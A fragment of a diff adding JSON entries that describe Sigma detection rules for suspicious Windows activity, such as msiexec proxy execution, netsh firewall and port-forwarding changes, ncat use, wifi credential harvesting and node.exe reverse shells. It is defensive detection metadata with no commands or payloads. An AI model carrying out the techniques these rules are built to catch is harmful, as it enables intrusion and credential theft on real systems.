"car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_mshta_spawn_shell.yml", + "author": "Michael Haag", + "level": "high", + "falsepositive": [ + "Printer software / driver installations", + "HP software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "value": "Suspicious Msiexec Load DLL", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/04/24", + "filename": "proc_creation_win_msiexec_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "value": "Suspicious MsiExec Embedding Parent", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" + ], + "tags": [ + "attack.t1218.007", + "attack.defense_evasion" + ], + "creation_date": "2022/04/16", + "filename": "proc_creation_win_msiexec_embedding.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "value": "Suspicious Msiexec Execute Arbitrary DLL", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_msiexec_execute_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", + "value": "Suspicious Msiexec Quiet Install", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://twitter.com/_st0pp3r_/status/1583914244344799235", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/01/16", + "filename": "proc_creation_win_msiexec_install_quiet.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "value": "Suspicious Msiexec Quiet Install From Remote Location", + "meta": { + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], + "creation_date": "2022/10/28", + "filename": "proc_creation_win_msiexec_install_remote.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been used for discovery and persistence tactics", + "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", + "value": "Msra.exe Process Injection", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2022/06/24", + "filename": "proc_creation_win_msra_process_injection.yml", + "author": "Alexander McDonald", + "level": "high", + "falsepositive": [ + "Legitimate use of Msra.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", + "value": "Remote Desktop Protocol Use Mstsc", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001" + ], + "creation_date": "2022/01/07", + "filename": "proc_creation_win_mstsc.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "WSL (Windows Sub System For Linux)", + "Other currently unknown software" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects multiple suspicious process in a limited timeframe", + "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands", + "meta": { + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-04-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + ], + "tags": [ + "car.2013-04-002", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_multiple_susp_cli.yml", + "author": "juju4", + "level": "low", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", + "value": "Ncat Execution", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "proc_creation_win_netcat_execution.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate ncat use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", + "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "value": "Netsh RDP Port Opening", + "meta": { + "refs": [ + "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/05/23", + "filename": "proc_creation_win_netsh_allow_port_rdp.yml", + "author": "Sander Wiebing", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "value": "Netsh Port or Application Allowed", + "meta": { + "refs": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_fw_add.yml", + "author": "Markus Neis, Sander Wiebing", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location", + "meta": { + "refs": [ + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2020/05/25", + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "value": "Netsh Firewall Rule Deletion", + "meta": { + "refs": [ + "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/14", + "filename": "proc_creation_win_netsh_fw_delete.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "value": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/01/09", + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe", + "meta": { + "refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2019/10/24", + "filename": "proc_creation_win_netsh_packet_capture.yml", + "author": "Kutepov Anton, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_port_fwd.yml", + "author": "Florian Roth, omkar72, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP", + "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "value": "Netsh RDP Port Forwarding", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2019/01/29", + "filename": "proc_creation_win_netsh_port_fwd_3389.yml", + "author": "Florian Roth, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administration" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", + "value": "Harvesting of Wifi Credentials Using netsh.exe", + "meta": { + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/04/20", + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", + "author": "Andreas Hunkeler (@Karneades), oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "value": "Use of NetSupport Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/25", + "filename": "proc_creation_win_netsupport.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2022/03/12", + "filename": "proc_creation_win_network_scan_loop.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate script" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.", + "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "value": "Network Sniffing", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_network_sniffing.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "uuid": "5b768e71-86f2-4879-b448-81061cbae951", + "value": "Suspicious Manipulation Of Default Accounts", + "meta": { + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_net_default_accounts_manipulation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "uuid": "62510e69-616b-4078-b371-847da438cc03", + "value": "Windows Network Enumeration", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_net_enum.yml", + "author": "Endgame, JHasenbusch (ported for oscd.community)", + "level": "low", + "falsepositive": [ + "Legitimate use of net.exe utility by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "value": "Suspicious Reconnaissance Activity Using Net", + "meta": { + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_net_recon.yml", + "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Inventory tool runs", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Identifies creation of local users via the net.exe command.", + "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", + "value": "Net.exe User Account Creation", + "meta": { + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2018/10/30", + "filename": "proc_creation_win_net_user_add.yml", + "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", + "level": "medium", + "falsepositive": [ + "Legitimate user creation.", + "Better use event IDs for user creation rather than command line rules." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "value": "Net.exe User Account Creation - Never Expire", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2022/07/12", + "filename": "proc_creation_win_net_user_add_never_expire.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an admin share is mounted using net.exe", + "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", + "value": "Mounted Windows Admin Shares with net.exe", + "meta": { + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_net_use_admin_share.yml", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "level": "medium", + "falsepositive": [ + "Administrators" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "value": "New Network Provider - CommandLine", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/08/23", + "filename": "proc_creation_win_new_network_provider.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a new service.", + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2019/10/21", + "filename": "proc_creation_win_new_service_creation.yml", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2022/08/28", + "filename": "proc_creation_win_nimgrab.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate use of Nim on developer systems" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects nltest commands that can be used for information discovery", + "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "value": "Recon Activity with NLTEST", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://attack.mitre.org/techniques/T1482/", + "https://attack.mitre.org/techniques/T1016/", + "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016", + "attack.t1482" + ], + "creation_date": "2021/07/24", + "filename": "proc_creation_win_nltest_recon.yml", + "author": "Craig Young, oscd.community, Georg Lauenstein", + "level": "medium", + "falsepositive": [ + "Legitimate administration use but user must be check out" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "value": "Node.exe Process Abuse", + "meta": { + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", + "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "https://nodejs.org/api/cli.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/09/09", + "filename": "proc_creation_win_node_abuse.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", + "uuid": "f4bbd493-b796-416e-bbf2-121235348529", + "value": "Non Interactive PowerShell", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "proc_creation_win_non_interactive_powershell.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", + "level": "low", + "falsepositive": [ + "Legitimate programs executing PowerShell scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "value": "Non-privileged Usage of Reg or Powershell", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_non_priv_reg_or_ps.yml", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + 